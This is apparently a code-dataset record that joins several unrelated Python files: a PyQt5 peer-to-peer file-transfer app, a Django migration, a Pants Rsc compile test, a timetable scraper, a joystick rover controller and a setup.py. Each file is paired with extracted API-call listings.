font.setFamily("MS Reference Sans Serif") font.setPointSize(10) font.setItalic(False) self.label_3.setFont(font) self.label_3.setObjectName("label_3") self.label_15 = QtWidgets.QLabel(self.centralwidget) self.label_15.setGeometry(QtCore.QRect(32, 300, 390, 20)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) self.label_15.setFont(font) self.label_15.setObjectName("label_15") self.label_16 = QtWidgets.QLabel(self.centralwidget) self.label_16.setGeometry(QtCore.QRect(32, 93, 47, 13)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) self.label_16.setFont(font) self.label_16.setObjectName("label_16") self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget) self.pushButton_3.setGeometry(QtCore.QRect(290, 100, 111, 23)) self.pushButton_3.setObjectName("pushButton_3") MainWindow.setCentralWidget(self.centralwidget) self.statusbar = QtWidgets.QStatusBar(MainWindow) self.statusbar.setObjectName("statusbar") MainWindow.setStatusBar(self.statusbar) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "P2PFileTransfer")) self.pushButton.setText(_translate("MainWindow", "Send")) self.pushButton.clicked.connect(self.sendFile) self.label_4.setText(_translate("MainWindow", "Instructions:")) self.label_5.setText(_translate("MainWindow", "Drop the file here:")) self.label_6.setText(_translate("MainWindow", "Send:")) self.label_7.setText(_translate("MainWindow", "Receive:")) self.label_8.setText(_translate("MainWindow", "Instructions:")) self.label_9.setText(_translate("MainWindow", "you just give it a name and extension and you are done!")) self.label_10.setText(_translate("MainWindow", "sending peer(there are lots of tutorials on internet) then")) self.label_11.setText(_translate("MainWindow", "For receiving a file you have to paste the public ip of the")) self.label_12.setText(_translate("MainWindow", "IP:")) self.label_13.setText(_translate("MainWindow", "Filename:")) self.label_14.setText(_translate("MainWindow", "extension:")) self.pushButton_2.setText(_translate("MainWindow", "Receive")) self.pushButton_2.clicked.connect(self.receiveFile) self.label.setText(_translate("MainWindow", "Specify the buffer(leave blank for default)(client has to have the same) ")) self.label_2.setText(_translate("MainWindow", "Drop the file and hit send")) self.label_3.setText(_translate("MainWindow", "have the same buffer)(max suggested buffer 256000) ")) self.label_15.setText(_translate("MainWindow", "remember to specify the same buffer as the server above")) self.label_16.setText(_translate("MainWindow", "Buffer:")) self.pushButton_3.setText(_translate("MainWindow", "Localhost")) self.pushButton_3.clicked.connect(self.localHostClick) self.localHost=False def localHostClick(self): if self.localHost==False: self.localHost=True else: self.localHost=False self.textEdit.setText("localHost set to: "+str(self.localHost)) def receiveFile(self): startRecv=time.perf_counter() bufferStr=self.lineEdit_4.text() if bufferStr=="": buffer=32000 else: buffer=int(bufferStr) s = socket.socket() # Create a socket object host = self.lineEdit.text() #Ip address that the TCPServer is there port = 25575 # Reserve a port for your service every new transfer wants a new port or you must wait. s.connect((host, port)) welcomemsg="Hello server!" s.send(bytearray(welcomemsg,"utf-8")) with open('received_file', 'wb') as f: print('file opened') #self.textEdit.append('receiving data...') while True: data = s.recv(buffer) #print('data=%s', (data)) if not data: break # write data to a file f.write(data) f.close() endRecv=time.perf_counter() finalTimeRecv=endRecv-startRecv self.textEdit.append('Successfully got the file in '+str(round(finalTimeRecv,3))+"s") s.close() print('connection closed') filename=self.lineEdit_2.text() ext=self.lineEdit_3.text() os.rename("received_file",filename+ext) def sendFile(self): if self.localHost==False: openPort = port_forward_3.EnablePort(25575) #openPort = portforwardlib.forwardPort(25575,25575,"","",False,"TCP","","P2Pfiletranfer","") else: xd=1 filepath= self.textEdit.toPlainText() filepath=filepath.replace("file:///","") bufferStr=self.lineEdit_4.text() if bufferStr=="": buffer=32000 else: buffer=int(bufferStr) port = 25575 # Reserve a port for your service every new transfer wants a new port or you must wait. s = socket.socket() # Create a socket object host = "" # Get local machine name s.bind((host, port)) # Bind to the port s.listen(5) # Now wait for client connection. self.textEdit.append('Server listening....') i=0 while i==0: conn, addr = s.accept() # Establish connection with client. self.textEdit.append('Got connection from' + str(addr)) startSend=time.perf_counter() data = conn.recv(buffer) #self.textEdit.setText('Server received' + str(repr(data))) filename=filepath #In the same folder or path is this file running must the file you want to tranfser to be f = open(filename,'rb') l = f.read(buffer) #self.textEdit.append('Sending file ') while (l): conn.send(l) l = f.read(buffer) f.close() endSend=time.perf_counter() finalTimeSend=endSend-startSend self.textEdit.append('Done sending in '+str(round(finalTimeSend,3))+"s") conn.close() if self.localHost==False: closePort=port_forward_3.DisablePort(25575) else: xd=1 i=1 if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) MainWindow = QtWidgets.QMainWindow() ui = Ui_MainWindow() ui.setupUi(MainWindow) MainWindow.show() sys.exit(app.exec_())
[ "PyQt5.QtWidgets.QWidget", "PyQt5.QtWidgets.QTextEdit", "port_forward_3.DisablePort", "PyQt5.QtWidgets.QMainWindow", "PyQt5.QtWidgets.QLineEdit", "PyQt5.QtGui.QFont", "socket.socket", "port_forward_3.EnablePort", "PyQt5.QtCore.QMetaObject.connectSlotsByName", "os.rename", "time.perf_counter", "PyQt5.QtCore.QRect", "PyQt5.QtWidgets.QStatusBar", "PyQt5.QtWidgets.QLabel", "PyQt5.QtWidgets.QApplication", "PyQt5.QtWidgets.QPushButton" ]
[((12811, 12843), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (12833, 12843), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((12861, 12884), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (12882, 12884), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((714, 743), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (731, 743), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((828, 869), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (849, 869), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1014, 1053), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1033, 1053), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1191, 1227), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1207, 1227), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1307, 1320), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1318, 1320), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1505, 1541), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1521, 1541), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1676, 1712), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1692, 1712), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1791, 1804), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1802, 1804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1989, 2025), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2005, 2025), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2106, 2119), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2117, 2119), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2304, 2340), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2320, 2340), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2421, 2434), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2432, 2434), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2619, 2655), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2635, 2655), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2736, 2749), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2747, 2749), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2935, 2971), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2951, 2971), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3053, 3066), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3064, 3066), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3255, 3291), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3271, 3291), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3373, 3386), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3384, 3386), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3575, 3611), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3591, 3611), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3749, 3788), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3768, 3788), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3929, 3968), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3948, 3968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4113, 4149), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4129, 4149), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4289, 4328), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4308, 4328), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4473, 4509), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4489, 4509), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4651, 4692), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4672, 4692), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4841, 4877), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4857, 4877), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4955, 4968), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4966, 4968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5177, 5213), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5193, 5213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5293, 5306), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5304, 5306), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5524, 5563), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5543, 5563), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5706, 5742), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5722, 5742), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5822, 5835), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5833, 5835), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6051, 6087), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6067, 6087), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6169, 6182), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6180, 6182), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6371, 6407), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6387, 6407), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6487, 6500), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6498, 6500), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6693, 6734), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6714, 6734), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6943, 6975), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainWindow'], {}), '(MainWindow)\n', (6963, 6975), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((7122, 7171), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (7159, 7171), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((9466, 9485), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9483, 9485), False, 'import time\n'), ((9638, 9653), 'socket.socket', 'socket.socket', ([], {}), '()\n', (9651, 9653), False, 'import socket\n'), ((10427, 10446), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (10444, 10446), False, 'import time\n'), ((10717, 10759), 'os.rename', 'os.rename', (['"""received_file"""', '(filename + ext)'], {}), "('received_file', filename + ext)\n", (10726, 10759), False, 'import os\n'), ((11381, 11396), 'socket.socket', 'socket.socket', ([], {}), '()\n', (11394, 11396), False, 'import socket\n'), ((906, 936), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(310)', '(129)', '(91)', '(73)'], {}), '(310, 129, 91, 73)\n', (918, 936), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1088, 1118), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(130)', '(281)', '(71)'], {}), '(30, 130, 281, 71)\n', (1100, 1118), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1261, 1290), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(26)', '(131)', '(16)'], {}), '(32, 26, 131, 16)\n', (1273, 1290), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1575, 1605), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(113)', '(220)', '(13)'], {}), '(32, 113, 220, 13)\n', (1587, 1605), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1746, 1774), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(6)', '(131)', '(16)'], {}), '(32, 6, 131, 16)\n', (1758, 1774), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2059, 2089), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(212)', '(131)', '(16)'], {}), '(32, 212, 131, 16)\n', (2071, 2089), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2374, 2404), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(236)', '(131)', '(16)'], {}), '(32, 236, 131, 16)\n', (2386, 2404), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2689, 2719), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(284)', '(381)', '(20)'], {}), '(32, 284, 381, 20)\n', (2701, 2719), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3006, 3036), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(269)', '(381)', '(20)'], {}), '(32, 269, 381, 20)\n', (3018, 3036), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3326, 3356), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(248)', '(480)', '(31)'], {}), '(32, 248, 480, 31)\n', (3338, 3356), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3646, 3675), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(327)', '(47)', '(13)'], {}), '(32, 327, 47, 13)\n', (3658, 3675), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3823, 3853), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(324)', '(113)', '(20)'], {}), '(87, 324, 113, 20)\n', (3835, 3853), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4005, 4035), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(352)', '(113)', '(20)'], {}), '(87, 352, 113, 20)\n', (4017, 4035), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4184, 4213), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(354)', '(47)', '(13)'], {}), '(32, 354, 47, 13)\n', (4196, 4213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4365, 4395), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(380)', '(113)', '(20)'], {}), '(87, 380, 113, 20)\n', (4377, 4395), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4544, 4573), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(380)', '(51)', '(16)'], {}), '(32, 380, 51, 16)\n', (4556, 4573), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4731, 4762), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(230)', '(322)', '(101)', '(81)'], {}), '(230, 322, 101, 81)\n', (4743, 4762), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4909, 4938), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(32)', '(371)', '(41)'], {}), '(32, 32, 371, 41)\n', (4921, 4938), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5247, 5276), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(62)', '(291)', '(41)'], {}), '(32, 62, 291, 41)\n', (5259, 5276), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5600, 5629), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(79)', '(91)', '(113)', '(20)'], {}), '(79, 91, 113, 20)\n', (5612, 5629), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5776, 5805), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(48)', '(371)', '(41)'], {}), '(32, 48, 371, 41)\n', (5788, 5805), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6122, 6152), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(300)', '(390)', '(20)'], {}), '(32, 300, 390, 20)\n', (6134, 6152), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6442, 6470), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(93)', '(47)', '(13)'], {}), '(32, 93, 47, 13)\n', (6454, 6470), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6773, 6804), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(290)', '(100)', '(111)', '(23)'], {}), '(290, 100, 111, 23)\n', (6785, 6804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((10840, 10872), 'port_forward_3.EnablePort', 'port_forward_3.EnablePort', (['(25575)'], {}), '(25575)\n', (10865, 10872), False, 'import port_forward_3\n'), ((11882, 11901), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (11899, 11901), False, 'import time\n'), ((12397, 12416), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (12414, 12416), False, 'import time\n'), ((12649, 12682), 'port_forward_3.DisablePort', 'port_forward_3.DisablePort', (['(25575)'], {}), '(25575)\n', (12675, 12682), False, 'import port_forward_3\n')]
# Generated by Django 2.2.5 on 2020-01-05 14:01 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('users', '0018_user_stripe_customer_id'), ] operations = [ migrations.AlterModelOptions( name='guest', options={'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'}, ), ]
[ "django.db.migrations.AlterModelOptions" ]
[((230, 339), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""guest"""', 'options': "{'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'}"}), "(name='guest', options={'verbose_name': 'ゲスト',\n 'verbose_name_plural': 'ゲスト'})\n", (258, 339), False, 'from django.db import migrations\n')]
# coding=utf-8 # Copyright 2018 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import absolute_import, division, print_function, unicode_literals import os from pants.util.contextutil import temporary_dir from pants_test.backend.jvm.tasks.jvm_compile.base_compile_integration_test import BaseCompileIT class RscCompileIntegration(BaseCompileIT): def test_basic_binary(self): with temporary_dir() as cache_dir: config = { 'cache.compile.rsc': {'write_to': [cache_dir]}, 'jvm-platform': {'compiler': 'rsc'} } pants_run = self.run_pants( ['compile', 'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin', ], config) self.assert_success(pants_run) def test_basic_binary_hermetic(self): with temporary_dir() as cache_dir: config = { 'cache.compile.rsc': {'write_to': [cache_dir]}, 'jvm-platform': {'compiler': 'rsc'}, 'compile.rsc': { 'execution_strategy': 'hermetic', 'incremental': False, } } with self.temporary_workdir() as workdir: pants_run = self.run_pants_with_workdir( ['compile', 'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin', ], workdir, config) self.assert_success(pants_run) path = os.path.join( workdir, 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc', 'classes/org/pantsbuild/testproject/mutual/A.class') self.assertTrue(os.path.exists(path)) path = os.path.join( workdir, 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc', 'outline/META-INF/semanticdb/out.semanticdb') self.assertTrue(os.path.exists(path)) path = os.path.join( workdir, 'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar') self.assertTrue(os.path.exists(path)) def test_executing_multi_target_binary(self): with temporary_dir() as cache_dir: config = { 'cache.compile.rsc': {'write_to': [cache_dir]}, 'jvm-platform': {'compiler': 'rsc'}, 'compile.rsc': {'execution_strategy': 'subprocess'} } with self.temporary_workdir() as workdir: pants_run = self.run_pants_with_workdir( ['run', 'examples/src/scala/org/pantsbuild/example/hello/exe', ], workdir, config) self.assert_success(pants_run) self.assertIn('Hello, Resource World!', pants_run.stdout_data)
[ "os.path.exists", "pants.util.contextutil.temporary_dir", "os.path.join" ]
[((474, 489), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (487, 489), False, 'from pants.util.contextutil import temporary_dir\n'), ((872, 887), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (885, 887), False, 'from pants.util.contextutil import temporary_dir\n'), ((2197, 2212), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (2210, 2212), False, 'from pants.util.contextutil import temporary_dir\n'), ((1429, 1612), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc"""', '"""classes/org/pantsbuild/testproject/mutual/A.class"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc'\n , 'classes/org/pantsbuild/testproject/mutual/A.class')\n", (1441, 1612), False, 'import os\n'), ((1696, 1871), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc"""', '"""outline/META-INF/semanticdb/out.semanticdb"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc'\n , 'outline/META-INF/semanticdb/out.semanticdb')\n", (1708, 1871), False, 'import os\n'), ((1955, 2080), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar"""'], {}), "(workdir,\n 'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar'\n )\n", (1967, 2080), False, 'import os\n'), ((1659, 1679), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1673, 1679), False, 'import os\n'), ((1918, 1938), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1932, 1938), False, 'import os\n'), ((2117, 2137), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2131, 2137), False, 'import os\n')]
# -*- coding: utf-8 -*- from grab.spider import Spider from schedule.models import Time class TimeParser(Spider): BASE = 'http://lp.edu.ua/poyasnennya-do-rozkladu' initial_urls = [BASE] def prepare(self): super(TimeParser, self).prepare() def shutdown(self): super(TimeParser, self).shutdown() @classmethod def task_initial(self, grab, task): for tr in grab.doc.select('//table[@class="timetable"]/tr')[1:]: for key, td in enumerate(tr.select('./td')): if key == 0: time = Time.get_by_number(td.text()) if time: pass else: time = Time(time_number=td.text().strip()) if key == 1: tabletime = td.text().split(u'−') time.time_start = tabletime[0].strip() time.time_end = tabletime[1].strip() self.save_time(time) @classmethod def save_time(self, time): Time.add(time)
[ "schedule.models.Time.add" ]
[((1052, 1066), 'schedule.models.Time.add', 'Time.add', (['time'], {}), '(time)\n', (1060, 1066), False, 'from schedule.models import Time\n')]
import signal import threading from rover_mavros import MavrosRover from joystick import Joystick import copy import time def signal_handler(_, __, stop_callback): print('stop event set') stop_callback() stopper = threading.Event() class Control: def __init__(self, joystick, rover): self.joystick = joystick self.rover = rover self.rover.rc_throttle.v_min = -1.0 self.rover.rc_throttle.v_max = 1.0 self.cmd_throttle_value = 0.0 self.cmd_steering_value = 0.0 self.stop_flag = False def run(self): print('run') while not self.stop_flag: x = copy.copy(self.joystick.axis_states['x']) y = copy.copy(self.joystick.axis_states['y']) self.rover.set_throttle(-y) self.rover.set_steering(-x) self.rover.send_cmd() time.sleep(0.002) self.rover.release_rc() print('stopped') def stop(self): self.stop_flag = True if __name__ == '__main__': rover = MavrosRover() joystick = Joystick() joystick.start() control = Control(joystick, rover) g = lambda singal, frame: signal_handler(signal, frame, control.stop) signal.signal(signal.SIGINT, g) control.run() joystick.stop()
[ "signal.signal", "time.sleep", "rover_mavros.MavrosRover", "threading.Event", "joystick.Joystick", "copy.copy" ]
[((225, 242), 'threading.Event', 'threading.Event', ([], {}), '()\n', (240, 242), False, 'import threading\n'), ((1047, 1060), 'rover_mavros.MavrosRover', 'MavrosRover', ([], {}), '()\n', (1058, 1060), False, 'from rover_mavros import MavrosRover\n'), ((1077, 1087), 'joystick.Joystick', 'Joystick', ([], {}), '()\n', (1085, 1087), False, 'from joystick import Joystick\n'), ((1228, 1259), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'g'], {}), '(signal.SIGINT, g)\n', (1241, 1259), False, 'import signal\n'), ((651, 692), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['x']"], {}), "(self.joystick.axis_states['x'])\n", (660, 692), False, 'import copy\n'), ((709, 750), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['y']"], {}), "(self.joystick.axis_states['y'])\n", (718, 750), False, 'import copy\n'), ((879, 896), 'time.sleep', 'time.sleep', (['(0.002)'], {}), '(0.002)\n', (889, 896), False, 'import time\n')]
#!/usr/bin/env python3 from setuptools import setup, find_packages setup( name='pyobs-core', version='0.13', description='robotic telescope software', author='<NAME>', author_email='<EMAIL>', packages=find_packages(include=['pyobs', 'pyobs.*']), entry_points={ 'console_scripts': [ 'pyobs=pyobs.cli.pyobs:main', 'pyobsd=pyobs.cli.pyobsd:main', ], 'gui_scripts': [ 'pyobsw=pyobs.cli.pyobsw:main', ] }, python_requires='>=3.7', install_requires=[ 'scipy', 'paramiko', 'pandas', 'pytz', 'astropy', 'astroplan', 'PyYAML', 'numpy', 'sleekxmpp', 'py_expression_eval', 'requests' ], extras_require={ 'full': [ 'photutils', 'lmfit', 'tornado', 'python-telegram-bot', 'sep;platform_system=="Linux"', 'pyinotify;platform_system=="Linux"', 'python-daemon;platform_system=="Linux"' ] } )
[ "setuptools.find_packages" ]
[((226, 269), 'setuptools.find_packages', 'find_packages', ([], {'include': "['pyobs', 'pyobs.*']"}), "(include=['pyobs', 'pyobs.*'])\n", (239, 269), False, 'from setuptools import setup, find_packages\n')]
